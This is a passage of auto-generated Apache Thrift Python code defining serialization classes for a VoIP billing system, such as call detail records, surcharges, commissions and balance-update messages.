oprot.writeFieldEnd()
if self.i_did_authorization is not None:
oprot.writeFieldBegin('i_did_authorization', TType.I64, 3)
oprot.writeI64(self.i_did_authorization)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 4)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.incoming_did is not None:
oprot.writeFieldBegin('incoming_did', TType.STRING, 5)
oprot.writeString(self.incoming_did.encode('utf-8') if sys.version_info[0] == 2 else self.incoming_did)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 6)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I32, 7)
oprot.writeI32(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 8)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 9)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 10)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 11)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 12)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 13)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 14)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 15)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 16)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 17)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 18)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 19)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 20)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 21)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Surcharges(object):
"""
Attributes:
- i_surcharge
- i_call
- cost
- i_surcharge_type
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_surcharge', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.DOUBLE, 'cost', None, None, ), # 3
(4, TType.I64, 'i_surcharge_type', None, None, ), # 4
)
def __init__(self, i_surcharge=None, i_call=None, cost=None, i_surcharge_type=None,):
self.i_surcharge = i_surcharge
self.i_call = i_call
self.cost = cost
self.i_surcharge_type = i_surcharge_type
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_surcharge = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_surcharge_type = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Surcharges')
if self.i_surcharge is not None:
oprot.writeFieldBegin('i_surcharge', TType.I64, 1)
oprot.writeI64(self.i_surcharge)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 3)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.i_surcharge_type is not None:
oprot.writeFieldBegin('i_surcharge_type', TType.I64, 4)
oprot.writeI64(self.i_surcharge_type)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Commissions(object):
"""
Attributes:
- i_commission
- i_account
- i_customer
- i_cdrs_customer
- commission_size
- setup_time
- i_call
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_commission', None, None, ), # 1
(2, TType.STRUCT, 'i_account', (NullInt64, NullInt64.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'i_customer', (NullInt64, NullInt64.thrift_spec), None, ), # 3
(4, TType.I64, 'i_cdrs_customer', None, None, ), # 4
(5, TType.DOUBLE, 'commission_size', None, None, ), # 5
(6, TType.I64, 'setup_time', None, None, ), # 6
(7, TType.I64, 'i_call', None, None, ), # 7
)
def __init__(self, i_commission=None, i_account=None, i_customer=None, i_cdrs_customer=None, commission_size=None, setup_time=None, i_call=None,):
self.i_commission = i_commission
self.i_account = i_account
self.i_customer = i_customer
self.i_cdrs_customer = i_cdrs_customer
self.commission_size = commission_size
self.setup_time = setup_time
self.i_call = i_call
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_commission = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.i_account = NullInt64()
self.i_account.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i_customer = NullInt64()
self.i_customer.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_cdrs_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.commission_size = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Commissions')
if self.i_commission is not None:
oprot.writeFieldBegin('i_commission', TType.I64, 1)
oprot.writeI64(self.i_commission)
oprot.writeFieldEnd()
if self.i_account is not None:
oprot.writeFieldBegin('i_account', TType.STRUCT, 2)
self.i_account.write(oprot)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.STRUCT, 3)
self.i_customer.write(oprot)
oprot.writeFieldEnd()
if self.i_cdrs_customer is not None:
oprot.writeFieldBegin('i_cdrs_customer', TType.I64, 4)
oprot.writeI64(self.i_cdrs_customer)
oprot.writeFieldEnd()
if self.commission_size is not None:
oprot.writeFieldBegin('commission_size', TType.DOUBLE, 5)
oprot.writeDouble(self.commission_size)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 6)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 7)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CallsSdp(object):
"""
Attributes:
- i_calls_sdp
- i_call
- i_cdrs_connection
- time_stamp
- sdp
- sip_msg_type
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_calls_sdp', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.STRUCT, 'i_cdrs_connection', (NullInt64, NullInt64.thrift_spec), None, ), # 3
(4, TType.STRUCT, 'time_stamp', (UnixTime, UnixTime.thrift_spec), None, ), # 4
(5, TType.STRING, 'sdp', 'UTF8', None, ), # 5
(6, TType.STRING, 'sip_msg_type', 'UTF8', None, ), # 6
)
def __init__(self, i_calls_sdp=None, i_call=None, i_cdrs_connection=None, time_stamp=None, sdp=None, sip_msg_type=None,):
self.i_calls_sdp = i_calls_sdp
self.i_call = i_call
self.i_cdrs_connection = i_cdrs_connection
self.time_stamp = time_stamp
self.sdp = sdp
self.sip_msg_type = sip_msg_type
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_calls_sdp = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i_cdrs_connection = NullInt64()
self.i_cdrs_connection.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.time_stamp = UnixTime()
self.time_stamp.read(iprot)
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.sdp = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.sip_msg_type = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CallsSdp')
if self.i_calls_sdp is not None:
oprot.writeFieldBegin('i_calls_sdp', TType.I64, 1)
oprot.writeI64(self.i_calls_sdp)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_cdrs_connection is not None:
oprot.writeFieldBegin('i_cdrs_connection', TType.STRUCT, 3)
self.i_cdrs_connection.write(oprot)
oprot.writeFieldEnd()
if self.time_stamp is not None:
oprot.writeFieldBegin('time_stamp', TType.STRUCT, 4)
self.time_stamp.write(oprot)
oprot.writeFieldEnd()
if self.sdp is not None:
oprot.writeFieldBegin('sdp', TType.STRING, 5)
oprot.writeString(self.sdp.encode('utf-8') if sys.version_info[0] == 2 else self.sdp)
oprot.writeFieldEnd()
if self.sip_msg_type is not None:
oprot.writeFieldBegin('sip_msg_type', TType.STRING, 6)
oprot.writeString(self.sip_msg_type.encode('utf-8') if sys.version_info[0] == 2 else self.sip_msg_type)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CdrsCustomersDids(object):
"""
Attributes:
- i_cdrs_customers_did
- i_call
- i_customer
- i_did
- did
- result
- cost
- duration
- billed_duration
- setup_time
- connect_time
- disconnect_time
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_customers_did', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_customer', None, None, ), # 3
(4, TType.I64, 'i_did', None, None, ), # 4
(5, TType.STRING, 'did', 'UTF8', None, ), # 5
(6, TType.I32, 'result', None, None, ), # 6
(7, TType.DOUBLE, 'cost', None, None, ), # 7
(8, TType.DOUBLE, 'duration', None, None, ), # 8
(9, TType.DOUBLE, 'billed_duration', None, None, ), # 9
(10, TType.I64, 'setup_time', None, None, ), # 10
(11, TType.I64, 'connect_time', None, None, ), # 11
(12, TType.I64, 'disconnect_time', None, None, ), # 12
(13, TType.DOUBLE, 'price_1', None, None, ), # 13
(14, TType.DOUBLE, 'price_n', None, None, ), # 14
(15, TType.I32, 'interval_1', None, None, ), # 15
(16, TType.I32, 'interval_n', None, None, ), # 16
(17, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 17
(18, TType.DOUBLE, 'connect_fee', None, None, ), # 18
(19, TType.I32, 'free_seconds', None, None, ), # 19
(20, TType.I32, 'grace_period', None, None, ), # 20
)
def __init__(self, i_cdrs_customers_did=None, i_call=None, i_customer=None, i_did=None, did=None, result=None, cost=None, duration=None, billed_duration=None, setup_time=None, connect_time=None, disconnect_time=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None,):
self.i_cdrs_customers_did = i_cdrs_customers_did
self.i_call = i_call
self.i_customer = i_customer
self.i_did = i_did
self.did = did
self.result = result
self.cost = cost
self.duration = duration
self.billed_duration = billed_duration
self.setup_time = setup_time
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_customers_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.result = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsCustomersDids')
if self.i_cdrs_customers_did is not None:
oprot.writeFieldBegin('i_cdrs_customers_did', TType.I64, 1)
oprot.writeI64(self.i_cdrs_customers_did)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 3)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.i_did is not None:
oprot.writeFieldBegin('i_did', TType.I64, 4)
oprot.writeI64(self.i_did)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 5)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I32, 6)
oprot.writeI32(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 7)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 8)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 9)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 10)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 11)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 12)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 13)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 14)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 15)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 16)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 17)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 18)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 19)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 20)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class UpdateAccountBalanceMessage(object):
"""
Attributes:
- i_account
- delta
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_account', None, None, ), # 1
(2, TType.DOUBLE, 'delta', None, None, ), # 2
)
def __init__(self, i_account=None, delta=None,):
self.i_account = i_account
self.delta = delta
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_account = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.delta = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UpdateAccountBalanceMessage')
if self.i_account is not None:
oprot.writeFieldBegin('i_account', TType.I64, 1)
oprot.writeI64(self.i_account)
oprot.writeFieldEnd()
if self.delta is not None:
oprot.writeFieldBegin('delta', TType.DOUBLE, 2)
oprot.writeDouble(self.delta)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class UpdateCustomerBalanceMessage(object):
"""
Attributes:
- i_customer
- delta
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_customer', None, None, ), # 1
(2, TType.DOUBLE, 'delta', None, None, ), # 2
)
def __init__(self, i_customer=None, delta=None,):
self.i_customer = i_customer
self.delta = delta
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.delta = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UpdateCustomerBalanceMessage')
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 1)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.delta is not None:
oprot.writeFieldBegin('delta', TType.DOUBLE, 2)
oprot.writeDouble(self.delta)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class UpdateVendorBalanceMessage(object):
"""
Attributes:
- i_vendor
- delta
- i_connection
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_vendor', None, None, ), # 1
(2, TType.DOUBLE, 'delta', None, None, ), # 2
(3, TType.I64, 'i_connection', None, None, ), # 3
)
def __init__(self, i_vendor=None, delta=None, i_connection=None,):
self.i_vendor = i_vendor
self.delta = delta
self.i_connection = i_connection
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_vendor = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.delta = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UpdateVendorBalanceMessage')
if self.i_vendor is not None:
oprot.writeFieldBegin('i_vendor', TType.I64, 1)
oprot.writeI64(self.i_vendor)
oprot.writeFieldEnd()
if self.delta is not None:
oprot.writeFieldBegin('delta', TType.DOUBLE, 2)
oprot.writeDouble(self.delta)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 3)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class UpdatePlanMinutesMessage(object):
"""
Attributes:
- i_account
- i_service_plan
- delta
- chargeable_seconds
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_account', None, None, ), # 1
(2, TType.I64, 'i_service_plan', None, None, ), # 2
(3, TType.DOUBLE, 'delta', None, None, ), # 3
(4, TType.DOUBLE, 'chargeable_seconds', None, None, ), # 4
)
def __init__(self, i_account=None, i_service_plan=None, delta=None, chargeable_seconds=None,):
self.i_account = i_account
self.i_service_plan = i_service_plan
self.delta = delta
self.chargeable_seconds = chargeable_seconds
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_account = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_service_plan = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.DOUBLE:
self.delta = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.chargeable_seconds = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
